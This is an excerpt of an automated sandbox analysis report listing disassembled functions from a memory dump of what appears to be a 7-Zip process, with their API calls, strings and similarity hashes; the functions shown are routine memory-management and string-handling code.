Opcode Fuzzy Hash: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
Instruction Fuzzy Hash: 02F0FEA6701D8581DE059F2ADA997AD6362FB84FE4F98D432CD0E4B359DF28C499C310

Function 009B2344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B2375
fputs.MSVCRT ref: 009B2383

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Strings

, xrefs: 009B235E
:, xrefs: 009B2359

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$fputc
String ID: $:
API String ID: 1185151155-4041779174
Opcode ID: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
Instruction ID: 4f74806a50b33fd414c26d9537ffcd7faec72dc02bd9a9d4d2cbfd77da4593d1
Opcode Fuzzy Hash: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
Instruction Fuzzy Hash: 51E06D97304A8082CB219B2AED5835D6361FB99FCCF48C122EE8E0771ADF2CC108CB11

Function 009BD4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 009BD4CB
GetProcAddress.KERNEL32 ref: 009BD4DB

Strings

GetLargePageMinimum, xrefs: 009BD4D1
kernel32.dll, xrefs: 009BD4C4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetLargePageMinimum$kernel32.dll
API String ID: 1646373207-2515562745
Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
Instruction ID: 483ff8af0833320bb86477f39977261c3cb305b0d57cadadd8809141a43b904d
Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
Instruction Fuzzy Hash: 14E0BF64763B0291FE19DF65FDA53642364AB85B15F840529851E42361FF3CD245C340

Function 009A71BC Relevance: 6.5, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A734A
free.MSVCRT ref: 009A7355
GetLastError.KERNEL32 ref: 009A73AC
free.MSVCRT ref: 009A73B9
free.MSVCRT ref: 009A73C4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
Instruction ID: 25fbde5725cc5f9e51296961f33500c3a392c95c20e8138b893caeaab04c3c95
Opcode Fuzzy Hash: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
Instruction Fuzzy Hash: 68818D33319A4086CB24DF66E84175EB7A5F789BA4F548215EF9E43B68EF38C851C740

Function 00984210 Relevance: 6.4, APIs: 5, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
Instruction ID: 36005570cf7ca6f0b752a4ddd6e797bc15dfca138e807c8914b0d604451d91cc
Opcode Fuzzy Hash: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
Instruction Fuzzy Hash: AA41D42371978196CB20EF22D54066E6764FF86BE4F489221FFAD17B59DF28C545C700

Function 009A4C2C Relevance: 6.4, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A4C6F
memmove.MSVCRT ref: 009A4D71
free.MSVCRT ref: 009A4D8E
free.MSVCRT ref: 009A4DA3
free.MSVCRT ref: 009A4DB1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
Instruction ID: 7ddb16b14d4fa680533b70df4f95da51956c460d32b34faca3ceee54f8f32126
Opcode Fuzzy Hash: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
Instruction Fuzzy Hash: C241E9272182C095C720DB25E44029FABB1F3D77A8F584115EB990BB99C7BED099CB51

Function 009AF4AC Relevance: 6.3, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009AF5BC
free.MSVCRT ref: 009AF5D3
free.MSVCRT ref: 009AF5DE

Part of subcall function 0097383C: memmove.MSVCRT ref: 00973877

free.MSVCRT ref: 009AF5EF
free.MSVCRT ref: 009AF5FA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ErrorLastmemmove
String ID:
API String ID: 3561842085-0
Opcode ID: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
Instruction ID: 4b769286c07f1ff66161d6724087a2927d0794015b5bc2d2e31b56358841f2b1
Opcode Fuzzy Hash: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
Instruction Fuzzy Hash: A0315273214A4081CB20DF25E46175E7360FBCABA4F94A225F79E477A9DF38C545C740

Function 0097EF70 Relevance: 6.3, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097EFBF
free.MSVCRT ref: 0097EFC8
free.MSVCRT ref: 0097EFD0
memmove.MSVCRT ref: 0097F00D
free.MSVCRT ref: 0097F015

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
Instruction ID: 28c41522261d25a8505dba3c101a2f89fe56146ee6d35cdf74f1789340316a93
Opcode Fuzzy Hash: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
Instruction Fuzzy Hash: 0F21BF23711B848ADA20EF5BE9942297324F789BE4B48C135EF6D0BB95DF34D862C310

Function 0097C790 Relevance: 6.3, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0097C7BB
memcmp.MSVCRT ref: 0097C7D6
memcmp.MSVCRT ref: 0097C7EC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
Instruction ID: 7f2b476461fbb1639a9e802c743f3687fb1eef3f63c448ee3c79633178d68d2e
Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
Instruction Fuzzy Hash: 2111C2E370874191FB089F2A99513E82229DB49FD4F94D429CE098B307EF38CE45C305

Function 00973BE4 Relevance: 6.3, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C36
_CxxThrowException.MSVCRT ref: 00973C54
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C80
_CxxThrowException.MSVCRT ref: 00973C9E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
Instruction ID: 224adb71b36d1788a468add76c21d36c8fe3f854be2f906ae20f08d28a8256ec
Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
Instruction Fuzzy Hash: 79215CB3704B4886DB10DF2AE850759B7A5FB98B98F58C125DA8D87724EB78C945C700

Function 0097182C Relevance: 6.3, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00971868
free.MSVCRT ref: 00971872
free.MSVCRT ref: 0097187C
free.MSVCRT ref: 009718A9
free.MSVCRT ref: 009718B1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
Instruction ID: 537f466c8f43c2cb1e932f099f21950d3b4ccff7401b281429e30ea1d8e304ad
Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
Instruction Fuzzy Hash: B501D22371694497DA24EF26D9102AD2320F7C2FB4B588321AF2D17791DF24D852C310

Function 009B7D84 Relevance: 6.3, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B7DA9
free.MSVCRT ref: 009B7DB2
free.MSVCRT ref: 009B7DE5
free.MSVCRT ref: 009B7DF2
free.MSVCRT ref: 009B7DFB

Part of subcall function 009994A8: free.MSVCRT ref: 009994DB
Part of subcall function 009994A8: free.MSVCRT ref: 009994E3
Part of subcall function 009994A8: free.MSVCRT ref: 009994F0
Part of subcall function 009994A8: free.MSVCRT ref: 0099951C
Part of subcall function 009994A8: free.MSVCRT ref: 00999525
Part of subcall function 009994A8: free.MSVCRT ref: 0099952D
Part of subcall function 009994A8: free.MSVCRT ref: 0099953A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
Instruction ID: 67da17081f85e1d57493f8ca39534918c83f103ea39395a8cd7819cc3f126ae3
Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
Instruction Fuzzy Hash: 74016223B1695089DA16AF2ADD513BC6324FBC9FF4F994221EF1D4B365EE25C842C390

Function 00993864 Relevance: 6.3, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00993877

Part of subcall function 00990BBC: free.MSVCRT ref: 00990BCC
Part of subcall function 00990BBC: free.MSVCRT ref: 00990BD5
Part of subcall function 00990BBC: free.MSVCRT ref: 00990C00
Part of subcall function 00990BBC: free.MSVCRT ref: 00990C08

Part of subcall function 00991474: free.MSVCRT ref: 009914A6
Part of subcall function 00991474: free.MSVCRT ref: 009914AF
Part of subcall function 00991474: free.MSVCRT ref: 009914B8
Part of subcall function 00991474: free.MSVCRT ref: 009914C0

free.MSVCRT ref: 00993892
free.MSVCRT ref: 0099389B
free.MSVCRT ref: 009938C6
free.MSVCRT ref: 009938CE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
Instruction ID: 3abed44730526d3be09cb5af5a818a91bad5392870762979beb9ed17a821a2f1
Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
Instruction Fuzzy Hash: 3DF01D23B268509ACE15EF2BDD5126C2324FBC5F947498161AF2D4B751DF50C962C350

Function 0099C9CC Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099C9FE
free.MSVCRT ref: 0099CA07
free.MSVCRT ref: 0099CA10
free.MSVCRT ref: 0099CA19
free.MSVCRT ref: 0099CA21

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
Instruction ID: 6fbc938eac05c7fb916837bfd492ac856763c7aa6c53271b3c27963ee03f16d7
Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
Instruction Fuzzy Hash: E4F090537269948DCA20EF2BDD912682324BF96BE875C8171FF1E07754EE20C852C310

Function 00982A84 Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00982A94
free.MSVCRT ref: 00982A9D
free.MSVCRT ref: 00982AC9
free.MSVCRT ref: 00982AD1
free.MSVCRT ref: 00982ADE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
Instruction ID: 417e23a883a84407140b00ecf1769c2315e70408efb8b98148ab58aaa741567a
Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
Instruction Fuzzy Hash: 31F0302372594489CB25BF37DD512686324FBD5FD47598161AF2D4B399DE24C842C350

Function 0099CA3C Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099CA6E
free.MSVCRT ref: 0099CA77
free.MSVCRT ref: 0099CA80
free.MSVCRT ref: 0099CA89
free.MSVCRT ref: 0099CA91

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
Instruction ID: 629869578a006ae2ec2d4819f67a1193afb0690ce9eb2bc2fe388539a3ee8f28
Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
Instruction Fuzzy Hash: 66F06D937129848ECB10EF2BDC912682324AF95BA9B5C8171AF2D07755DE20C892C350

Function 009B7690 Relevance: 6.3, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B76AF
free.MSVCRT ref: 009B76BB
free.MSVCRT ref: 009B76C7
free.MSVCRT ref: 009B76D3

Part of subcall function 009BB310: free.MSVCRT ref: 009BB335
Part of subcall function 009BB310: free.MSVCRT ref: 009BB342
Part of subcall function 009BB310: free.MSVCRT ref: 009BB34E
Part of subcall function 009BB310: free.MSVCRT ref: 009BB358
Part of subcall function 009BB310: free.MSVCRT ref: 009BB362
Part of subcall function 009BB310: free.MSVCRT ref: 009BB36C
Part of subcall function 009BB310: free.MSVCRT ref: 009BB376
Part of subcall function 009BB310: free.MSVCRT ref: 009BB380

free.MSVCRT ref: 009B76E4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
Instruction ID: 1b8686694d99e9cc0d2079fe6dc619ee7dc96856e38f590b25ee680c787fb00a
Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
Instruction Fuzzy Hash: D8E0C93322598081CA50EF76C8962EC2360F7D9B68F584271AA2E8E366DE10C983C360

Function 009B02F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 009B03A1
memmove.MSVCRT ref: 009B03F9
_CxxThrowException.MSVCRT ref: 009B0454

Strings

Internal collision in update action set, xrefs: 009B0383, 009B043C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$memmove
String ID: Internal collision in update action set
API String ID: 265668421-2378581463
Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
Instruction ID: d31c45fdbfb60db8433becddbf8c63474c1991c9239833857fd498d92a69878c
Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
Instruction Fuzzy Hash: 864124323086858ADB34DB19E5587AF7B91F3C57ACF048215EB8903B69EB78D545CB00

Function 009B4594 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B46C5
free.MSVCRT ref: 009B46DD
free.MSVCRT ref: 009B46E7

Part of subcall function 00972C78: free.MSVCRT ref: 00972CAE

Strings

= , xrefs: 009B461C, 009B4634

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: =
API String ID: 1294909896-2525689732
Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
Instruction ID: 07010381d42e4db5cd141f41aeb72d5040fe222eafdb9a490e2b1625c0105916
Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
Instruction Fuzzy Hash: 0031D763329A80D6CB10DF55E58079EB720F7D2760F949222FB8E43A69DF78C945DB00

Function 009A6D5C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A6E91

Part of subcall function 00973518: free.MSVCRT ref: 00973551

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 009A6E83

Strings

exe, xrefs: 009A6DEE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: exe
API String ID: 1534225298-1801697008
Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
Instruction ID: afd58867e1af44ea46ebd3a1c4a0e6dfd947969a0e3d75798a3a736e7341c394
Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
Instruction Fuzzy Hash: 05318923304941A6CE34EB25E88029EBB30F7C57D4F849212FB9E47679DF28D64AC740

Function 00999380 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009993B0
SysStringByteLen.OLEAUT32 ref: 00999411
free.MSVCRT ref: 0099942C
memmove.MSVCRT ref: 00999462

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
